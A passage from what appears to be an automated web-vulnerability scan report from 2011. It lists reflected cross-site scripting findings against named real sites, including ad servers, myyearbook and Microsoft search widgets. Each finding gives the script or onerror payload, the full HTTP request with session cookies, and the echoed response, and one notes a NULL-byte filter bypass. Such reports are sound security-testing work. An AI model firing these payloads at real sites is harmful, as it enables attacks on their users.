GET /dsatserving2/servlet/BannerServer?tagid=1494&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fk%3B227818253%3B0-0%3B0%3B31210306%3B748-470%2F60%3B37939276%2F37957052%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3Dpencil%3Btile%3D20%3B~sscs%3D%3Faeab6"><script>alert(1)</script>1e5a96efa2&rfd=www.lifescript.com&adh=60&adw=470&frd=1311276185290 HTTP/1.1
Host: contextlinks.netseer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;sz=470x60;ord=101352252258050

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 8 Aug 2006 10:00:00 GMT
Set-Cookie: netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fed8bc94363e849,1311276197526,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:23:17 GMT; Path=/
Set-Cookie: netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:23:17 GMT; Path=/
Set-Cookie: netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276197527,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvaG93X3RvX3F1aWV0X3RoZV9zeW1wdG9tc19vZl9hZHVsdF9hZGhkLmFzcHg,US-TX-623-Dallas,0,0"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:23:17 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 19:23:17 GMT
Content-Length: 9412


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

   <script>
function submitsearch() {
   var searchbox = document.getElementById('search_box'
...[SNIP]...
52/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?aeab6"><script>alert(1)</script>1e5a96efa2http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fed8bc94363e849&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adul
...[SNIP]...

3.53. http://dinclinx.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dinclinx.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3e5f2<script>alert(1)</script>9544fab98de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?s=103&e=0&t=21&f=javascript&3e5f2<script>alert(1)</script>9544fab98de=1 HTTP/1.1
Host: dinclinx.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Jul 2011 20:13:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 22 Jul 2011 20:13:30 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 69

// Error: Unknown parameter 3e5f2<script>alert(1)</script>9544fab98de

3.54. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload fb0a5<script>alert(1)</script>94af7ff54fd was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&uid=amRZRPmRXMjwy5CP_10671987fb0a5<script>alert(1)</script>94af7ff54fd&xy=0%2C0&wh=728%2C90&vchannel=610&cid=acerno&iad=1311428805773-56517315376549960&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=32&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=6805757a-ba62-4ca3-815c-dec40d38f03a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=356E3A397C093437191E68EA4107E03E; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Sat, 23 Jul 2011 13:49:04 GMT

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("amRZRPmRXMjwy5CP_10671987fb0a5<script>alert(1)</script>94af7ff54fd");

3.55. http://home.myyearbook.com/Countries [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://home.myyearbook.com
Path:   /Countries

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload %00d6faf<script>alert(1)</script>ecefbf78900 was submitted in the callback parameter. This input was echoed as d6faf<script>alert(1)</script>ecefbf78900 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /Countries?callback=jsonp1311271115649%00d6faf<script>alert(1)</script>ecefbf78900 HTTP/1.1
Host: home.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:59:15 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP COR CURa OUR STP UNI"
Expires: Fri, 22 Jul 2011 17:59:15 GMT
Etag: 9929a004e133f519aee5127443e199ec
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
X-MyPoolMember: 10.100.10.193
Content-Length: 9574

jsonp1311271115649.d6faf<script>alert(1)</script>ecefbf78900({"countryList":[{"id":3,"code":"AF","name":"AFGHANISTAN"},{"id":4,"code":"AX","name":"ALAND ISLANDS"},{"id":5,"code":"AL","name":"ALBANIA"},{"id":6,"code":"DZ","name":"ALGERIA"},{"id":7,"code":"AS","n
...[SNIP]...

3.56. http://home.myyearbook.com/feed/giftFeedItems [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://home.myyearbook.com
Path:   /feed/giftFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 69b90<img%20src%3da%20onerror%3dalert(1)>f128adf2cac was submitted in the REST URL parameter 2. This input was echoed as 69b90<img src=a onerror=alert(1)>f128adf2cac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/giftFeedItems69b90<img%20src%3da%20onerror%3dalert(1)>f128adf2cac?callback=jsonp1311271115651 HTTP/1.1
Host: home.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:59:50 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
Expires: Thu, 21 Jul 2011 18:14:50 GMT
Last-Modified: Thu, 21 Jul 2011 17:55:05 GMT
Etag: aedd7834fdcc696d5a9e2d79a792b098
Content-Length: 124
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.20.99

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: giftFeedItems69b90<img src=a onerror=alert(1)>f128adf2cac"});

3.57. http://home.myyearbook.com/feed/myMagFeedItems [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://home.myyearbook.com
Path:   /feed/myMagFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a69db<img%20src%3da%20onerror%3dalert(1)>b240730221e was submitted in the REST URL parameter 2. This input was echoed as a69db<img src=a onerror=alert(1)>b240730221e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/myMagFeedItemsa69db<img%20src%3da%20onerror%3dalert(1)>b240730221e?callback=jsonp1311271115652 HTTP/1.1
Host: home.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:09 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
Expires: Thu, 21 Jul 2011 18:15:09 GMT
Last-Modified: Thu, 21 Jul 2011 18:00:04 GMT
Etag: 72ee677033a252199b44f29084641c6f
Content-Length: 125
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.20.98

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: myMagFeedItemsa69db<img src=a onerror=alert(1)>b240730221e"});

3.58. http://home.myyearbook.com/feed/tvFeedItems [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://home.myyearbook.com
Path:   /feed/tvFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 84802<img%20src%3da%20onerror%3dalert(1)>b41c649be67 was submitted in the REST URL parameter 2. This input was echoed as 84802<img src=a onerror=alert(1)>b41c649be67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/tvFeedItems84802<img%20src%3da%20onerror%3dalert(1)>b41c649be67?callback=jsonp1311271115650 HTTP/1.1
Host: home.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:59:36 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
Expires: Thu, 21 Jul 2011 18:14:36 GMT
Last-Modified: Thu, 21 Jul 2011 17:55:05 GMT
Etag: cbecd414d090ef14541c17fa8dc0dbfb
Content-Length: 122
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.20.99

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: tvFeedItems84802<img src=a onerror=alert(1)>b41c649be67"});

3.59. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4b5a3<img%20src%3da%20onerror%3dalert(1)>681c7b7ef9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4b5a3<img src=a onerror=alert(1)>681c7b7ef9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?appid=1004&scopeid=1&boxId=searchBox&btnId=searchImg&watermark=Search%20the%20Visual%20Studio%20Gallery&overrideWatermark=true&searchLocation=%2fsite%2fsearch&allowEmptySearch=true&focusOnInit=false&minimumTermLength=4&paramsCallback=Galleries.searchIntellisense.getCallbackParams&4b5a3<img%20src%3da%20onerror%3dalert(1)>681c7b7ef9d=1 HTTP/1.1
Host: i1.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://visualstudiogallery.msdn.microsoft.com/site/search?f%5B0%5D.Type=User&f%5B0%5D.Value=Mike%20Barnett
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7afbaee-3910-41b0-9f73-42c5d519d743&Microsoft.CreationDate=07/23/2011 02:01:25&Microsoft.LastVisitDate=07/23/2011 02:03:22&Microsoft.NumberOfVisits=2&SessionCookie.Id=48B6F0A73328302A2806841DC13E324C; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 02:03:22&Microsoft.VisitStartDate=07/23/2011 02:01:25&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=111&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=b6d6365d4e204cf6ab451e30a23dcb6b; msdn=L=1033

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: 0a33ba4d88cdfe4151d6837db4809742
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB34
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Sat, 23 Jul 2011 14:04:42 GMT
Date: Sat, 23 Jul 2011 02:04:42 GMT
Content-Length: 12970
Connection: close


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
:true,"appId":"1004","boxId":"searchBox","btnId":"searchImg","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":"Galleries.searchIntellisense.getCallbackParams","queryParams":"&4b5a3<img src=a onerror=alert(1)>681c7b7ef9d=1","scopeId":"1","searchLocation":"\/site\/search","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search the Visual Studio Gallery"}} ).init();});
...[SNIP]...

3.60. http://i1.services.social.s-msft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.services.social.s-msft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e4d8d<img%20src%3da%20onerror%3dalert(1)>6a38d9abc96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e4d8d<img src=a onerror=alert(1)>6a38d9abc96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=SearchTextBox&btnid=SearchButton&brand=Msdn&loc=en-US&resref=&addEnglish=&rn=&rq=&watermark=&focusOnInit=False&beta=0&iroot=vstudio&cver=0001&e4d8d<img%20src%3da%20onerror%3dalert(1)>6a38d9abc96=1 HTTP/1.1
Host: i1.services.social.s-msft.com
Proxy-Connection: keep-alive
Referer: http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
ntCoent-Length: 12968
Content-Type: application/x-javascript
ETag: 41298f3245820050c97226acfb180f23
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB35
Content-Length: 12968
Cache-Control: public, max-age=43200
Expires: Sat, 23 Jul 2011 14:01:23 GMT
Date: Sat, 23 Jul 2011 02:01:23 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
px_searchBox({"allowEmptySearch":false,"appId":"1","boxId":"SearchTextBox","btnId":"SearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&beta=0&e4d8d<img src=a onerror=alert(1)>6a38d9abc96=1","scopeId":"9","searchLocation":"http:\/\/social.MSDN.microsoft.com\/Search\/en-US\/vstudio","serviceUri":"http:\/\/services.social.s-msft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search
...[SNIP]...

3.61. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i2.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 64f56<img%20src%3da%20onerror%3dalert(1)>582d4e0387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64f56<img src=a onerror=alert(1)>582d4e0387 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=ctl00_Masthead_Search_SearchTextBox&btnid=ctl00_Masthead_Search_SearchButton&brand=MSDN&loc=en-us&focusOnInit=true&Refinement=118&watermark=MSDN%20Magazine&64f56<img%20src%3da%20onerror%3dalert(1)>582d4e0387=1 HTTP/1.1
Host: i2.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/magazine/ee336135.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; s_cc=true; s_sq=%5B%5BB%5D%5D; msdn=L=1033; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7afbaee-3910-41b0-9f73-42c5d519d743&Microsoft.CreationDate=07/23/2011 02:01:25&Microsoft.LastVisitDate=07/23/2011 02:07:21&Microsoft.NumberOfVisits=5&SessionCookie.Id=48B6F0A73328302A2806841DC13E324C; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 02:07:21&Microsoft.VisitStartDate=07/23/2011 02:01:25&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=114&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=b6d6365d4e204cf6ab451e30a23dcb6b; ADS=SN=175A21EF

Response

HTTP/1.1 200 OK
ntCoent-Length: 13021
Content-Type: application/x-javascript
ETag: 2ed89b2cf89d47ef6d93c5da4147901c
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB30
Content-Length: 13021
Cache-Control: public, max-age=43200
Expires: Sat, 23 Jul 2011 14:08:06 GMT
Date: Sat, 23 Jul 2011 02:08:06 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
"boxId":"ctl00_Masthead_Search_SearchTextBox","btnId":"ctl00_Masthead_Search_SearchButton","focusOnInit":true,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&Refinement=118&64f56<img src=a onerror=alert(1)>582d4e0387=1","scopeId":"9","searchLocation":"http:\/\/social.MSDN.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search MSDN M
...[SNIP]...

3.62. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i3.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

